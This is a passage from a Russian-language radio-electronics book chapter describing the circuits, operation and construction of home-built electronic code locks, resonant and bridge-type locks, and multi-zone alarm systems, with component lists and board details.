Если во всех четырех пачках импульсов число импульсов соответствуют заданному коду, то по окончании кодовой посылки счетчик DD3. 2 установится в состояние, когда на выводе 13 последнего будет высокий логический уровень. После завершения кодовой посылки конденсатор С8 будет заряжаться через резистор R7 и, как только напряжение на нем достигнет порогового уровня логической единицы, счетчики DD3. 1 и DD3. 2 обнулятся. Схема перейдет в режим ожидания.
Таким образом, в конце каждой кодовой посылки, если код принят правильно, на выводе 13 счетчика DD3. 2 появляется положительный импульс, длительность которого зависит от параметров цепи R7C8. Этот импульс поступает на один из входов RS-триггера, выполненного на элементах DD5. 2 и DD5. 3, и переключает его в противоположное состояние. При этом на выводе 10 элемента DD5. 2 устанавливается уровень логической единицы, который через резистор R11 поступает на транзистор VT2. Последний открывается, срабатывает реле К1 и своими контактами включает исполнительный механизм — электромагнит, двигатель и т. п.
При открывании двери контакты кнопки SB1 размыкаются и устройство обесточивается. Реле К1 выключается. При закрывании двери напряжение питания+ 9 В через контакты SB1 поступает на элементы схемы. Конденсатор С 10 заряжается через резистор R 10, и положительный импульс, появляющийся на выводе 8 элемента DD5. 2, устанавливает RS-триггер в исходное состояние.
Если на вход детектора поступает посылка с другим кодом, или количеством пачек импульсов, то после ее окончания система переходит в ждущий режим и на выходе не появляется импульс, включающий исполнительное устройство.
Устройство смонтировано на плате размером 55х78 мм из двухстороннего фольгированного стеклотекстолита. Вид платы показан на рис. 6. 41, а размещение деталей на ней — на рис. 6. 42.
Питается устройство от стабилизированного источника тока напряжением + 9... 12 В.
Рис. 6. 41. Печатная плата декодирующего блока
Рис. 6. 42. Размещение деталей на плате декодирующего блока
6.1.4. Резонансные электронные замки и ключи
Принцип действия этих электронных замков и ключей основан на явлении электронного резонанса. Известно, что существует два вида резонансных колебательных LC-контуров: последовательный и параллельный. Схема таких контуров и графики, иллюстрирующие зависимость общего сопротивления контура от частоты подводимого сигнала, показаны на рис. 6. 5 и 6. 6.
Рис. 6. 5. Последовательный колебательный контур
Рис. 6. 6. Параллельный колебательный контур
Из графиков, изображенных на этих рисунках, видно, что сопротивление Z последовательного LC-контура (рис. 6. 5) на частоте резонанса fp стремится к нулю, а сопротивление параллельного (рис. 6. 6) LC-контура — к бесконечности. Иначе говоря, в момент резонанса последовательный контур подобен отрезку провода (точки А и В замкнуты), а параллельный — обрыву между точками А и В.
Резонансная частота контура может быть вычислена по известному соотношению:
где fp — резонансная частота контура, Гц; L — индуктивность катушки, Гн;
С — емкость конденсатора, Ф
Минимальное или максимальное сопротивление контура проявляется тем ярче, чем меньше потери в нем.
Приборы с использованием резонансного метода хорошо работают только на тех частотах, на которых резонансные свойства контуров выражены наиболее ярко. Для резонансного замка наиболее приемлемым является диапазон частот 50—500 кГц.
Для замков, использующих резонансный метод, — LC-контур — ключом может быть катушка индуктивности L или конденсатор С, входящие в этот контур. Если функцию ключа выполняет конденсатор, то контурная катушка должна находиться внутри замка, а на внешнюю сторону двери должны быть выведены два контакта, для подключения конденсатора. При подключении конденсатора к катушке в образовавшемся контуре возникает резонанс, изменяющий его сопротивление.
Примером использования последовательного контура может служить замок, схема которого приведена на рис. 6. 7.
Пока конденсатор СЗ, являющийся ключом замка, не подключен к контактам соединителя XI, выведенным на наружную сторону двери, сопротивление контура L1C2 на участке АВ большое, ток через резистор R4 незначительный и падение напряжения на нем недостаточно для открывания транзистора VT3. Если контакты соединителя X1 замкнуть накоротко отрезком провода, состояние замка не изменится, т. к. не будут соблюдены условия резонанса и сопротивление катушки L1 будет все равно больше, чем резонансное сопротивление Z контура. С тем же успехом можно подключать к контактам XI катушки индуктивности, резисторы, диоды и даже конденсаторы с емкостью, отличной от емкости конденсатора СЗ. Устройство сработает только в том случае, если подключаемый конденсатор СЗ будет обладать вполне определенным значением емкости (или близкой к ней), при котором в образовавшемся контуре L1 (С2+ СЗ) возникнет последовательный резонанс. Тогда сопротивление контура резко уменьшится,
Рис. 6. 7. Замок с последовательным резонансным контуром
ток генератора через диод VD1 и резистор R4 возрастает, напряжение, падающее на резисторе R4, откроет транзистор VT3, а следовательно, и тиристор VS1, сердечник электромагнита YA1, связанный с ригелем замка, втянется внутрь катушки и дверь откроется.
Параметры контура рассчитаны на частоту 465 кГц. Генератор замка собран на транзисторе VT1, между коллектором и базой которого включен пьезокерамический фильтр Z1 с резонансной частотой 465 кГц. Это обеспечивает высокую стабильность вырабатываемых генератором колебаний и делает устройство предельно простым. Транзистор VT2 выполняет роль эмиттерного повторителя и служит буферным элементом между генератором и исполнительной частью замка.
Конденсатор С2 устанавливается с внутренней стороны двери и защищает каскад на транзисторе VT3 от воздействия внешних помех. Использование конденсатора С2 позволяет уменьшить емкость конденсатора-ключа СЗ и тем самым уменьшить его размеры. Диод VD1 является однопериодным выпрямителем переменного напряжения, поступающего к контуру от генератора.
В качестве катушки L1 может быть использована контур ПЧ любого радиовещательного приемника, при этом конденсатор контура нужно составить из двух (С2 и СЗ). При использовании, например, броневого карбонильного сердечника СБ-12а, число витков катушки L1 должно составлять 145, 110 или 80 для емкостей контура (С2+ СЗ) 270 пФ, 510 пФ или 1000 пФ соответственно. Фильтр Z1 может быть типа ФП1П-021... 027, ФП1П-041, 043. При невозможности использовать готовые катушки и фильтры конструкцию генератора нужно изменить и выполнить его, например, на микросхеме (рис. 6. 8)
Частоту генератора можно изменять в широких пределах подстройкой сопротивления резистора R8. При напряжении питания+ 9 В можно использовать микросхемы К176ЛА7 или К176ЛЕ5. При использовании микросхем К561ЛА7 или К561ЛЕ5 напряжение питания может быть 3— 15 В.
Схема замка с параллельным колебательным контуром показана на рис, 6. 9. Здесь функцию ключа также выполняет конденсатор.
Пока конденсатор С2 не подключен к контактам соединителя XI, контур L1C1 не настроен в резонанс с частотой генератора и, следовательно, не оказывает заметного сопротивления колебаниям генератора (см. рис. 6. 8). Выпрямленное диодом VD1 напряжение частотой около 100 кГц открывает транзистор VT1. При этом транзистор VT2 закрывается. Это исходный режим замка. При подключении конденсаторного ключа С2 контур L1 (C1+ С2) оказывается настроенным в резонанс с частотой генератора. Сопротивление его резко возрас-
Рис. 6. 9. Замок с параллельным контуром
тает, ток через резистор R1 и падение напряжения на нем уменьшаются, вследствие чего транзистор VT1 закрывается. Это приводит к открыванию-транзистора VT2 и тринистора VS1. В результате электромагнит YA1 срабатывает и позволяет открыть дверь.
6. 1. 5. Замок мостового типа
Одним из преимуществ замка мостового типа, по сравнению с обычными замками, является то, что они позволяют довольно простыми средствами и достаточно быстро тиражировать ключи в случае возникновения такой необходимости, например при установке замка на входной двери подъезда многоэтажного дома, в дачном кооперативе, на лодочной станции, на гаражной стоянке, в офисе и т. д.
Принцип действия замков мостового типа основан на условии равновесия моста, т. е. произведения сопротивлений противоположных плеч моста должны быть равны. Схема измерительного моста приведена на рис. 6. 10.
Рис. 6. 10 Схема измерительного моста
К одной из диагоналей моста, например к точками А и В, подводится напряжение источника питания, а к другой — к точкам С и D, подключается ключевое устройство, реагирующее на минимальный сигнал в этой диагонали моста. Напряжение источника питания оказывается приложенным одновременно к двум, соединенным параллельно, делителям напряжения R1R3 и R2R4. Значение напряжения между точками С и D можно получить из условия равновесия моста:
R1R4=R2R3. Это требование относится к мостам постоянного и переменного тока. Схема замка с мостом переменного тока представлена на рис. 6. 11. Ключом такого замка служат последовательно соединенные резистор R4 и конденсатор С4. Другие плечи моста, питающегося переменным напряжением,
Рис. 6. 11. Замок мостового типа
снимаемым с обмотки IV сетевого трансформатора Т1, образуют цепочки аналогичных элементов. Пока ключ (R4C4) не подключен к контактам соединителя X1, мост разбалансирован. С него на вход ключевого устройства поступает переменное напряжение, которое выпрямляется диодами VD1 и VD2 и сглаживается конденсатором С5. Это напряжение приводит к открыванию транзистора VT1, закрыванию транзистора VT2 и тиристора VS1, обесточивающих обмотку электромагнита YA1. Замок закрыт.
При подключении ключа к контактам соединителя X1 мост оказывается сбалансированным. Напряжение на конденсаторе С5 уменьшается, отчего транзистор VT1 закрывается, а транзистор VT2 и тиристор VS1 открываются. Электромагнит YA1 срабатывает и своим якорем через систему механических тяг освобождает защелку механического замка — дверь можно открывать. При отсоединении ключа все устройство принимает исходное состояние. Для открывания замка изнутри помещения используется кнопка SB1, размещенная около замка с внутренней стороны двери.
Мост, а значит и замок в целом, реагирует только на подключение соответствующего ключа.
Источником питания ключевого устройства служит двухполупериодный выпрямитель VD3 с выходным напряжением 9 В. С обмотки III трансформатора Т1 напряжение 42 В подается на электромагнит YA1. Напряжение обмотки IV, питающей мост, должно быть в пределах 10—15 В. Электромагнит лучше всего использовать готовый, например от магнитофонов «Маяк», «Комета» или «Орбита».
6. 1. 6. Тиристорный замок
Замок рассчитан на управление восемью кнопками, находящимися на наружной стороне двери. Устройство просто в управлении, изготовлении и налаживании. Принципиальная схема замка приведена на рис. 6. 12.
Рис. 6. 12. Кодовый замок на тиристорах
Кнопки SB1 — SB4, работающие на замыкание, служат для набора установленного кода, а кнопки SB5 — SB8, работающие на размыкание, — для приведения устройства в исходное состояние, например в случае ошибочного набора кода или его подбора.
Замок срабатывает только при одновременном открывании всех тиристоров VS1—VS4. Добиться этого можно последовательным нажатием кнопок SB4, SB3, SB2 и SB1. При другой последовательности нажатия этих кнопок не все тиристоры будут открыты и, следовательно, открыть дверь не удастся. Исключение составляет случай, когда одновременно нажаты все четыре кнопки SB1— SB4. В случае нажатия на любую из кнопок SB5—SB8 цепь питания электромагнита YA1 обрывается и устройство приводится в исходное состояние. Тоже произойдет и при нажатии всех кодовых кнопок SB1—SB8. Кнопка SB9 служит для приведения замка в исходное состояние после открывания двери. Замок питается от сети переменного тока напряжением 220 В через трансформатор Т1 и двухполупериодный выпрямитель VD2. Для питания замка может быть использован любой блок питания с выходным напряжением 12—60 В, в зависимости от типа используемого электромагнита.
При безошибочном монтаже замок налаживания не требует.
6. 1. 7. Электронный кодовый замок
Этот замок прост в изготовлении и налаживании. При этом он позволяет использовать четырехзначный код и ограничивает время набора последнего. Электронная часть замка выполнена на микросхемах КМОП серии К561. Принципиальная схема устройства приведена на рис. 6. 13.
Рис. 6.13. Электронный кодовый замок
Устройство состоит из четырех RS-триггеров (две микросхемы К561ТМ2) DD1. 1, DD1. 2, DD2. 1, DD2. 2. Кнопки наборного поля располагаются с наружной стороны двери. Перед набором кода необходимо нажать кнопку SB11 «Сброс». Конденсатор С1 при этом быстро разряжается, а после отпускания кнопки он начинает медленно заряжаться от источника питания + 9 В через резистор R3. Пока напряжение на конденсаторе С1 не достигнет значения+ 4, 5 В и более, на входе S триггера DD1. 1 присутствует нулевой потенциал, который разрешает работу первого RS-триггера на элементе D1. 1.
При нажатии кнопки SB1 (первая цифра кода) триггер переключается и на его прямом выходе положительный потенциал изменяется на нулевой. Этот потенциал разрешает работу следующего триггера на элементе DD1. 2.
После нажатия кнопки SB2 (вторая цифра кода) триггер на элементе DD1. 2 переключается и на его инверсном выходе появляется нулевой потенциал, тем самым разрешается работа следующего RS-триггера на элементе DD2. 2. Далее последовательно нажимают кнопки SB3 (третья цифра кода) и SB4 (четвертая цифра кода), Наконец срабатывает последний RS-триггер на элементе DD2. 1, на его инверсном выходе появляется нулевой потенциал, что приводит к закрыванию транзистора VT1 и, как следствие, к открыванию транзистора VT2, который включает исполнительное устройство, например реле или электромагнит.
Прямой выход RS-триггера DD2. 1 для включения исполнительного устройства использовать нельзя. Это связано с тем, что в случае исполнительное устройство срабатывает даже при нажатии только одной кнопки SB4, т. е. без набора трех первых цифр, а это недопустимо.
Время набора цифр кода ограничено временем заряда конденсатора С1 и зависит от его емкости и сопротивления резистора R3. При номиналах, указанных на рис. 6. 13, время заряда составляет примерно 15 с. Если за это время код не будет набран, то все RS-триггеры возвратятся в исходное состояние и набор придется повторить. Если во время набора кода будет набрана хотя бы одна
Рис. 6.14. Печатная плата электронного замка
неправильная цифра (кнопки SB5—SB10), то все RS-тригтеры также возвратятся в исходное состояние.
Количество цифр в коде может быть увеличено, если включить последовательно еще несколько микросхем. Но, как показывает практика, четыре цифры обеспечивают достаточную надежность системы.
Печатная плата устройства выполнена из одностороннего фольгированного стекло текстолита размером 65х40 мм. Рисунок печатной платы приведен на рис. 6. 14. В качестве исполнительного устройства использовано реле РЭС-49. Размещение элементов на плате устройства приведено на рис. 6. 15. Микросхемы DD1, DD2 серии К561ТМ2 можно заменить без изменения рисунка печатной платы на микросхемы К176ТМ2. Резисторы R1 —R7 — типа МЛТ-0, 125 или им аналогичные. Конденсатор С1 нужно выбрать с возможно меньшим током утечки. Время набора устанавливают экспериментально, путем подбора номинала конденсатора С1. В качестве кнопок можно использовать любые, в том числе и от телефонного аппарата (кроме SB11).
Рис. 6.15 Размещение детален на плате электронного замка
6. 1. 8. Кодовый замок с пятизначным кодом
Кодовый замок, принципиальная схема которого изображена на рис. 6. 16, обладает высокой надежностью и устойчивостью к вибрациям, потребляет малую мощность и имеет небольшие размеры. Код замка состоит из пяти цифр, причем две последние повторяют две предыдущие.
Замок содержит наборное поле из кнопок SB1—SB 10 и дверную кнопку SB11, кодозадающий разъем X1, элементы совпадения DD1. 4, DD2. 4, DD3. 3, DD4. 3
Рис. 6. 16. Принципиальная электрическая схема кодового замка
и четыре триггера на элементах DD 1. 1, DD1. 2, DD2. 1, DD2. 2, DD3. 1, DD3. 2, DD4. 1, DD4. 2, ключевой каскад на транзисторе VT1 и тиристоре VS1, электромагнит YA1 и индикатор HL1.
В исходном состоянии (при закрытой двери) контакты дверной кнопки SB11 разомкнуты, и все триггеры находятся в состоянии, при котором на выводах 4 элементов DD1. 2, DD2. 2, DD3. 2 присутствует напряжение высокого уровня. При этом на базе транзистора VT1 будет напряжение низкого уровня, ключевой каскад закрыт, элементы YA1 и индикатор HL1 обесточены.
При управлении замком применяют пятизначный код, но для его набора используют только три кнопки, две из них нажимают дважды. Эти кнопки и служат «ключом» к замку. Код замка задают штепсельной частью разъема XI. Для этого его контакты распаивают следующим образом: контакт 11 соединяют с контактом, к которому подключена кнопка с цифрой, стоящей в коде первой;
контакт 12 — с кнопкой, соответствующей второй цифре кода, а контакт 13 — третьей. Оставшиеся контакты соединяют вместе. Таким образом, код замка содержит три основные начальные цифры. Две следующие дополнительные цифры повторяют две предыдущие. На схеме (рис. 6. 16) распайка показана для кода «21818».
Нажатием кнопки, соответствующей первой цифре кода, переключается триггер на элементах DD1. 2, DD1. 1. Напряжение высокого уровня с него поступает на вывод 12 элемента совпадения DD1. 4. При нажатии следующей кнопки (вторая цифра кода) на вывод 13 элемента DD1. 4 поступает уровень логической единицы, что приводит к переключению триггера на элементах DD2. 1 и DD2. 2. С его выхода (вывод 3) высокий уровень поступает на вход элемента совпадения DD2. 4 (вывод 12). Таким же образом при наборе третьей цифры кода переключится триггер на элементах DD3. 1, DD3. 2, а через элемент совпадения DD3. 3 после набора четвертой цифры кода — триггер на элементах DD4. 1, DD4. 2.
В результате такого последовательного переключения всех триггеров на один из входов элемента совпадения DD4. 3 поступает напряжение высокого уровня. Такой же уровень воздействует и на второй вход DD4. 3 через резистор R4. После набора пятой цифры кода на третьем входе элемента совпадения DD4. 3 также появится напряжение высокого уровня, а на его выходе — напряжение низкого уровня. Этот сигнал инвертируется элементом DD3. 4, и на базу транзистора VT1 через резистор R5 поступает уровень логической единицы. Транзистор VT1 открывается, что ведет к открыванию тиристора VS1, замыкающего цепь питания обмотки электромагнита YA1. Электромагнит срабатывает и оттягивает задвижку или защелку замка.
Если в процессе набора кода будет нажата кнопка с цифрой, не входящей в него, то все триггеры возвратятся в исходное состояние. После этого код нужно набирать заново. Триггеры устанавливаются в исходное состояние и при открывании двери. Сброс в этом случае осуществляется кнопкой SB11.
Во избежание ложного срабатывания электромагнита при подаче напряжения питания включена цепь R4, С2. При появлении напряжения питания напряжение
Рис. 6. 17. Блок питания замка
на конденсаторе С2 возрастает постепенно, благодаря чему все триггеры устанавливаются в исходное состояние. Конденсатор С1 предотвращает ложное срабатывание устройства от помех по цепям питания.
Блок питания замка (рис. 6. 17) содержит сетевой трансформатор Т1, мостовой выпрямитель VD1 и стабилизатор напряжения DA1.
В устройстве могут использоваться трансформаторы ТПП-112, ТПП-230, ТПП-230 и другие, обеспечивающие на обмотке II напряжение 10—15 В и мощность нагрузки более 5 Вт. Конструкция электромагнита показана на рис. 6. 18.
Рис. 6. 18. Конструкция электромагнита кодового замка
Электромагнит состоит из каркаса 1 с обмоткой, неподвижного магнитопровода 2 и подвижного магнитопровода 3. Обмотка содержит 4000 витков провода ПЭВ-2 0, 41 мм. Неподвижный магнитопровод увеличивает магнитный поток в электромагните. Подвижный магнитопровод должен свободно перемещаться в окне катушки. Оба магнитопровода изготовляют из мягкого железа.
Микросхемы серии К561 можно заменить на аналогичные серии К176 без каких-либо переделок печатной платы. Транзистор VT1 можно заменить на КТ3102, МП38А. Тиристор VS1 можно заменить на КУ202М. Индикатор HL1 -любая маломощная лампа накаливания на напряжение 220 В, она может, например, подсвечивать надпись «Входите».
Устройство выполнено на плате из двухстороннего стеклотекстолита размером 65х45 мм (рис. 6. 19). Размещение деталей на плате показано на рис. 6. 20.
Рис. 6. 19. Печатная плата кодового замка
Рис. 6. 20. Размещение деталей на плате кодового замка
6. 1. 9. Кодовый замок-звонок
У описываемого варианта кодового замка отсутствует традиционное наборное кнопочное поле. Конструкция выполнена на микросхемах ТТЛ, широко применяемых радиолюбителями. Код набирают одной кнопкой — последовательным нажатием и отпусканием. Она одновременно выполняет функцию кнопки дверного звонка, причем на время набора кода звонок отключается. При этом электронный блок замка формирует состоящее из нулей и единиц восьмиразрядное двоичное число. Введению единицы соответствует замыкание контактов кнопки в течение 1—2 с, а нуля — менее 1 с. Схема этого устройства приведена на рис. 6. 21.
При первом нажатии на кнопку в квартире раздается звуковой сигнал, а после ее отпускания устройство блокирует подачу сигнала на три секунды. За это время необходимо приступить к набору кода. Если период между нажатием не превышает трех секунд, то набор кода происходит без включения сигнала звонка, т. к. каждое очередное размыкание контактов кнопки продлевает блокировку звукового сигнала на три секунды.
После набора кода необходимо еще раз нажать кнопку и удерживать ее в этом состоянии. Если код набран верно, через две секунды сработает электромагнит замка и дверь откроется.
Необходимо помнить, что при наборе кода кнопку нельзя удерживать нажатой более двух секунд, иначе замок окажется блокированным в течение двадцати секунд и не будет реагировать на дальнейшие нажатия. Все эти меры существенно повышают секретность замка и сводят до минимума возможность подбора кода.
При замыкании контактов кнопки SB1 генератор, выполненный на триггере Шмитта DD2. 4, начинает вырабатывать прямоугольные импульсы частотой 1 кГц. Одновременно включается генератор, выполненный на элементах DD1. 3 и DD1. 4, вырабатывающий колебания частотой 6 Гц. Выходные импульсы этого генератора подсчитывает счетчик DD3, на основе которого выполнен делитель частоты на 6 (вывод 8) и на 12 (вывод 12).
В зависимости от длительности нажатия на кнопку SB1 на выводе счетчика DD3 устанавливается напряжение либо нулевого, либо единичного уровня. Каждое очередное замыкание контактов обнуляет счетчик — импульс обнуления формирует дифференцирующая цепь C4R9.
На триггерах микросхем DD5, DD6 выполнен сдвиговый регистр, который служит для формирования и хранения кодового слова, набираемого кнопкой SB1. Если оно соответствует слову, установленному шифратором на переключателях SA2 — SA9, то на все входы элемента совпадения DD7 поступает напряжение высокого уровня. На выходе этого элемента устанавливается напряжение низкого уровня, которое закрывает транзистор VT2, и на вывод 5 элемента DD1. 2 поступает напряжение высокого уровня с коллектора транзистора VT2;
светодиод HL1 гаснет.
Рис. 6. 21. Принципиальная электрическая схема кодового замка-звонка
На элементах DD1. 1 и DD1. 2 выполнен генератор прямоугольных импульсов частотой 10 кГц. Генератор запускается лишь в том случае, если на вывод 1 элемента DD1 1 будет подано напряжение высокого уровня.
Импульсы генератора, усиленные транзистором VT3, используются для управления работой тиристора VS1. При открывании тиристора VS1 срабатывает электромагнит YA1 привода защелки — замок открывается.
Система блокировки выполнена на микросхеме DD4. На одновибраторе DD4. 2 собрано устройство трехсекундной блокировки звукового сигнала звонка. В начальный момент, когда на кнопку звонка нажали первый раз, на вывод
Рис. 6. 22. Печатная плата замка-звонка
9 триггера Шмитта DD2. 3 с инверсного выхода одновибратора DD4. 2 (вывод 12) поступает напряжение высокого уровня. В результате этого импульсы с генератора DD2. 4 проходят на вход транзисторного ключа VT1, нагрузкой которого служит телефон BF1. Тональность звукового сигнала задается генератором на триггере Шмитта DD2. 4.
При размыкании контактов кнопки SB1 выходной уровень триггера Шмитта DD2. 2 (вывод 6) изменяется с низкого на высокий. Положительный перепад напряжения запускает одновибратор DD4. 2, и на его инверсном выходе (вывод 12) уровень изменяется с высокого на низкий. Длительность формируемого импульса низкого уровня устанавливается равной трем секундам выбором параметров времязадающей цепи C6R11. Поэтому сигнал генератора на триггере Шмитта DD2. 4 в течение трех секунд не поступает на базу транзистора VT1 — звонок блокирован. Переключателем SA1 можно отключить блокировку.
На одновибраторе DD4. 1 выполнено устройство двадцати секундной блокировки набора кода замка. Как только длительность нажатия на кнопку SB1 превысит 2 с, отрицательный перепад напряжения с вывода 12 счетчика DD3 запустит одновибратор DD4. 1.
Выходной импульс низкого уровня с инверсного выхода одновибратора DD4. 1 (вывод 4) обнулит содержимое регистров DD5, DD6. Длительность импульса устанавливают равной 20 с подбором параметров времязадающей цепи C5R10. В течение этого времени запись кода в регистры не происходит.
Триггеры Шмитта DD2. 1, DD2. 2 устраняют импульсы дребезга контактов кнопки SB1, а также формируют сигналы, управляющие работой блока.
Для питания устройства подойдет любой стабилизированный источник питания напряжением 5 В, рассчитанный на ток нагрузки не менее 0, 25 А. Устройство смонтировано на печатной плате рис. 6. 22. размером 65х120 мм из двухстороннего фольгированного стеклотекстолита толщиной 2 мм. Размещение деталей устройства на плате показано на рис. 6. 23.
Рис. 6. 23. Размещение детален на плате замка-звонка
Шифратор выполнен на малогабаритных переключателях. Трансформатор Т1 выполнен на магнитопроводе типоразмера К10х6хЗ из феррита марки 1500НМ. Обе обмотки содержат по 100 витков провода ПЭВ 0, 17 мм.
Пользование замком требует определенного навыка, поэтому перед началом эксплуатации следует потренироваться. Для этого тумблер SA1 устанавливает в нижнее по схеме положение, когда трехсекундная блокировка отключена, и переключателями SA2—SA9 устанавливают кодовое слово 10000000. Короткими нажатиями на кнопку SB1 вводят нули. Длительность нажатия на кнопку, соответствующую введению единицы, определяют по моменту отключения светодиода HL1.
После тренировки устанавливают выбранное кодовое слово. Переключатель SA1 возвращают в верхнее положение. Замок готов к работе.
6.2. Охранные системы и устройства.
6. 2. 1. Охранное устройство на несколько объектов
Устройство предназначено для охраны квартир, дач, офисов, гаражей и т. д. Оно позволяет контролировать до 8 объектов. Количество объектов при желании может быть увеличено до любого числа. Устройство позволяет использовать автономное питание. Предусмотрена возможность наращивания до любого числа контролируемых объектов, используя модульное построение устройства. При этом индицируется срабатывание сигнализации по каждому объекту отдельно. Срабатывание схемы на размыкание контактов позволяет контролировать целостность линии. При срабатывании сигнализации осуществляется ее автоматическая блокировка.
Рис. 6. 43. Охранное устройство на 8 объектов
Основные характеристики устройства:
Напряжение питания, В....................................................................... 12
Потребляемый ток:
в режиме охраны не более, мА........................................................ 50
в режиме тревоги, А..................................................................... 1, 5
Принципиальная схема охранного устройства на 8 объектов представлена на рис. 6. 43. За основу устройства взята типовая схема модуля выбора программ (МВП) телевизионных приемников на микросборке К04КП024А. Работа микросхемы DD1 типа К04КП024А заключается в следующем. При подаче на один
Рис. 6. 44. Печатная плата блока А1
из входов (выводы 11, 6, 8, 10, 4, 5, 7 или 9) положительного напряжения на двух выходах микросхемы появляется низкий уровень напряжения. Один выход (выводы 12, 14, 16, 18, 25, 27, 1 или З) служит для включения определенной программы, а другой (выводы 13, 15, 17, 19, 24, 26, 28 или 2 соответственно) — для включения индикации этой программы.
Стандартная схема включения микросборки К04КП024А дополнена ключами на транзисторах VT1 —VT8, а выходы микросхемы DD1 объединены в две шины через диоды VD1 —VD8 и светодиоды HL1 —HL8 соответственно.
При размыкании одного из контактов переключателей SA1 — SA8 открывается соответствующий транзисторный ключ (транзисторы VT1—VT8). Положительное напряжение через резистор R 17 и открытый транзистор поступает на вход
Рис. 6. 45. Печатная плата блока индикации
Рис. 6. 46. Размещение деталей на плате блока индикации и блока А1
микросхемы DD1, соответствующий разомкнутому контакту. Допустим, что разомкнулся контакт SA1. Транзистор VT1 открылся, и на вход микросхемы DD1 (вывод 11) поступило положительное напряжение. При этом на выводах 12 и 13 микросхемы DD1 появится напряжение низкого уровня, благодаря чему включится светодиод HL1, служащий для индикации сработавшего датчика, и база транзистора VT9 (р-п-р) через резистор R19 и диод VD1 замкнется на минус источника питания.
Транзистор VT9 откроется, и положительное напряжение источника питания поступит на реле К1 и через диод VD9 на вывод 14 микросхемы DD2. Реле К1 сработает и своими контактами включит внешнюю нагрузку (лампу, звонок и т. п.). При подаче питания на микросхему DD2 начинает работать генератор прямоугольных импульсов на элементах DD2. 1, DD2. 2, резисторе R21 и конденсаторе С1. С выхода генератора (вывод 4 DD2. 2) импульсы с частотой 0, 1 — 1 Гц через цепь формирования треугольного напряжения, выполненную на резисторах R22, R23 и конденсаторе СЗ, поступают на генератор, управляемый напряжением, выполненный на элементах DD2. 3, DD2. 4, резисторах R24, R25 и конденсаторах С4, С5. Под действием треугольного напряжения частота на выходах элементов DD2. 3 и DD2. 4 изменяется, т. е. происходит качание частоты в диапазоне 300—1500 Гц. Прямоугольные импульсы изменяющейся частоты с противофазных выходов генератора (выводы 10 и 11) поступают на мостовой усилитель мощности, выполненный на транзисторах VT10—VT13. Нагрузкой усилителя служит динамическая головка В1. Для сброса блокировки необходимо кратковременно отключить питание кнопкой SA9. Светодиод HL9 сигнализирует о включении охранного устройства.
Устройство выполнено на двух печатных платах размером 65х80 мм из двухстороннего фольгированного стеклотекстолита (плата А1 и плата сигнализации). Такая конструкция позволяет наращивать число охраняемых объектов просто добавлением необходимого количества плат А1. Чертеж печатной платы блока А1 приведен на рис. 6. 44, а платы блока индикации — на рис. 6. 45. Размещение деталей на обоих платах показано на рис. 6. 46.
Рис. 6. 47. Соединение блоков для увеличения количества охраняемых элементов
Рис. 6. 48 Звуковой генератор с пьезоизлучателем
Если необходимо увеличить число охраняемых объектов, например на 1 —8, то необходимо изготовить еще один блок А1 и произвести соединение блоков, как показано на рис. 6. 47. Транзисторы VT14, VT15 и VT16, VT17 образуют попарно коммутационные ключи, блокирующие одну из микросхем.
В устройстве могут быть использованы резисторы МЛТ-0, 125 или МЛТ-0, 25. Допускается разброс номиналов резисторов ±15%. Диоды серии КД522 можно заменить на любые, например КД521, КД510, Д220, Д18, Д9. Вместо реле К1 типа РЭС-48 можно использовать любое с рабочим напряжением 9—12 В. Если необходимость коммутации внешних устройств отсутствует, то реле К1 и диод VD 10 можно из схемы исключить. Транзисторы типа КТ315 можно заменить на транзисторы КТ3102, транзисторы типа КТ361 — на КТ3107.
Если нет необходимости в мощном выходном каскаде, а достаточно только привлечь внимание оператора, то генератор на микросхеме DD2 с выходным усилителем мощности можно заменить на генератор, собранный по схеме, приведенной на рис. 6. 48. В качестве звукового излучателя можно использовать пьезокерамический преобразователь ZQ1 типа ЗП-1 (ЗП-22 и др.). Можно оставить и прежнюю схему, исключив из нее транзисторы VT10—VT13, излучатель В1. Пьезокерамический излучатель ZQ1 подключают между общим проводом и выводом 10 или 11 микросхемы DD2.
Устройство, собранное из заведомо исправных деталей, в налаживании не нуждается.
6. 2. 2. Многоканальная охранная система
Многоканальная охранная система предназначена для организации охраны нескольких объектов, например дачных участков, или одного объекта, имеющего несколько помещений, нуждающихся в охране. Система подает сигнал по общей для всех датчиков двухпроводной шине и позволяет контролировать исправность датчиков путем световой и (или) звуковой сигнализации.
Система состоит из 12 идентичных блоков кодирования с датчиками тревожного сигнала и пульта декодирования и индикации, соединенных между собой общей двухпроводной линией связи. Работая поочередно, каждый блок кодирования выдает сигнал «Норма». Отсутствие сигнала от какого-либо блока воспринимается, как сигнал «Тревога», т. е. этот сигнал возникает либо при неисправности блока кодирования, либо при срабатывании охранного датчика.
При кодировании и декодировании сигналов используется число импульсный код. Первый датчик выдает в линию пачку из 3 импульсов, второй из 4 импульсов, последний, двенадцатый датчик, выдает 14 импульсов.
Блоки кодирования сделаны так, что они автоматически синхронизируются и выстраиваются в очередь в порядке возрастания числа импульсов в сигнале. Возможна работа системы при использовании от 1 до 12 блоков одновременно.
Система выполнена на КМОП микросхемах серии К176 и К561. Питание блоков кодирования происходит по линии связи.
Технические характеристики:
Число охраняемых объектов......................................................... до 12
Индикация состояния............................................... световая и звуковая
Напряжение питания, В..................................................................... 30
Потребляемый ток:
блок кодирования не более, мА........................................................ 1
блок индикации не более, мА........................................................ 100
Дальность действия, м................................................................. до 300
Размер плат:
блок кодирования, мм............................................................... 65х95
блок индикации, мм.............................................................. 115х 130
Рассмотрим работу системы, начиная с блока кодирования, принципиальная схема которого представлена на рис. 6. 49.
Все блоки кодирования выполнены по одинаковой схеме, поэтому рассмотрим работу только одного из них — первого. На его вход «Линия» приходят пачки импульсов отрицательной полярности амплитудой 30 В, формируемые поочередно другими блоками. Делитель, выполненный на резисторах R3 и R4, и транзистор VT1 образуют формирователь импульсов амплитудой 7—9 В, необходимых для нормальной работы КМОП микросхем. Элемент DD9. 1 формирует импульсы отрицательной полярности с крутыми фронтом и спадом. Цепь DD9. 2, R6, VD1, СЗ подавляет короткие импульсные помехи и формирует импульс отрицательной полярности, фронт которого совпадает с фронтом первого импульса в пачке на выходе элемента DD9. 1, а спад несколько задержан относительно спада последнего импульса пачки. Элемент DD9. 3, резистор R7 и конденсатор С4 образуют формирователь коротких положительных импульсов по фронту и спаду импульса с выхода элемента DDD9. 2. Эти короткие импульсы, пройдя через элементы DD10. 1, DD10. 2, устанавливают счетчики DD1 и DD3 в нулевое состояние. Счетчик DD3 во время паузы между пачками импульсов считает тактовые импульсы, поступающие на его вход С с тактового генератора через элементы DD2. 1, 